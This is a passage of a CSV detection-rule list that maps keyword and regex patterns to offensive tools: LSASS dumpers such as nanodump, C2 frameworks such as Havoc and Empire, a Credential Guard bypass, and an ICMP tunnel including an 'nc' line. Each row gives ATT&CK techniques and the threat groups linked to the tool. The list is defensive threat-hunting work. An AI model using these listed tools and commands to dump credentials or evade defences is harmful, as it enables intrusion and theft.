"*nanodump_ppl_dump.x86*",".{0,1000}nanodump_ppl_dump\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52643"
"*nanodump_ppl_medic*",".{0,1000}nanodump_ppl_medic.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52644"
"*nanodump_ppl_medic.x64*",".{0,1000}nanodump_ppl_medic\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52645"
"*nanodump_ppl_medic.x86*",".{0,1000}nanodump_ppl_medic\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52646"
"*nanodump_ssp*",".{0,1000}nanodump_ssp.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","52647"
"*nanodump_ssp*",".{0,1000}nanodump_ssp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52648"
"*nanodump_ssp.x64*",".{0,1000}nanodump_ssp\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52649"
"*nanodump_ssp.x64.dll*",".{0,1000}nanodump_ssp\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","52650"
"*nanodump_ssp.x64.dll*",".{0,1000}nanodump_ssp\.x64\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52651"
"*nanodump_ssp.x86*",".{0,1000}nanodump_ssp\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52652"
"*nanodump_ssp_embedded.*",".{0,1000}nanodump_ssp_embedded\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","52653"
"*NanoDumpChoose*",".{0,1000}NanoDumpChoose.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","52654"
"*nanodump-pipes*",".{0,1000}nanodump\-pipes.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","52655"
"*NanoDumpPPLmedicPipe*",".{0,1000}NanoDumpPPLmedicPipe.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","52656"
"*NanoDumpSSPPipe*",".{0,1000}NanoDumpSSPPipe.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","52657"
"*NanoDumpWriteDump*",".{0,1000}NanoDumpWriteDump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52658"
"*nanorobeus*_cs.x64.*",".{0,1000}nanorobeus.{0,1000}_cs\.x64\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52659"
"*nanorobeus*_cs.x86.*",".{0,1000}nanorobeus.{0,1000}_cs\.x86\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52660"
"*nanorobeus*dump*",".{0,1000}nanorobeus.{0,1000}dump.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52661"
"*nanorobeus.cna*",".{0,1000}nanorobeus\.cna.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52662"
"*nanorobeus.py*",".{0,1000}nanorobeus\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","52663"
"*nanorobeus.x64*",".{0,1000}nanorobeus\.x64.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52664"
"*nanorobeus.x64.*",".{0,1000}nanorobeus\.x64\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52665"
"*nanorobeus.x86*",".{0,1000}nanorobeus\.x86.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52666"
"*nanorobeus_brc4*",".{0,1000}nanorobeus_brc4.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52667"
"*nanorobeus64*",".{0,1000}nanorobeus64.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52668"
"*nanorobeus86*",".{0,1000}nanorobeus86.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52669"
"*nanorobeus-main*",".{0,1000}nanorobeus\-main.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52670"
"*nanorubeus.*",".{0,1000}nanorubeus\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52671"
"*Narasimha1997/fake-sms*",".{0,1000}Narasimha1997\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","52672"
"*Nasir Khan (r0ot h3x49)*",".{0,1000}Nasir\sKhan\s\(r0ot\sh3x49\).{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","52673"
"*nasm -f win64 ./syscalls.asm -o ./syscalls.obj*",".{0,1000}nasm\s\-f\swin64\s\.\/syscalls\.asm\s\-o\s\.\/syscalls\.obj.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","0","#linux","N/A","10","","N/A","","","","52674"
"*NativeBypassCredGuard.exe*",".{0,1000}NativeBypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","1","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","52675"
"*NativeDump.exe *.dmp*",".{0,1000}NativeDump\.exe\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","52676"
"*NativeEasyHook32.dll*",".{0,1000}NativeEasyHook32\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","52677"
"*NativeEasyHook64.dll*",".{0,1000}NativeEasyHook64\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","52678"
"*Naughty-Script.ps1*",".{0,1000}Naughty\-Script\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","52679"
"*nbdytundtyud5dey.azurewebsites.net*",".{0,1000}nbdytundtyud5dey\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","52681"
"*NBNSBruteForceHost*",".{0,1000}NBNSBruteForceHost.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52682"
"*NBNSBruteForcePause*",".{0,1000}NBNSBruteForcePause.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52683"
"*NBNSBruteForceSpoofer*",".{0,1000}NBNSBruteForceSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52684"
"*NBNSBruteForceSpoofer*",".{0,1000}NBNSBruteForceSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","52685"
"*NBNSBruteForceTarget*",".{0,1000}NBNSBruteForceTarget.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52686"
"*nbnsspoof.py*",".{0,1000}nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","52687"
"*NBNSSpoofer*",".{0,1000}NBNSSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52688"
"*nbzzb6sa6xuura2z.onion*",".{0,1000}nbzzb6sa6xuura2z\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52694"
"*nc 127.0.0.1 4000*",".{0,1000}nc\s127\.0\.0\.1\s4000.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","52696"
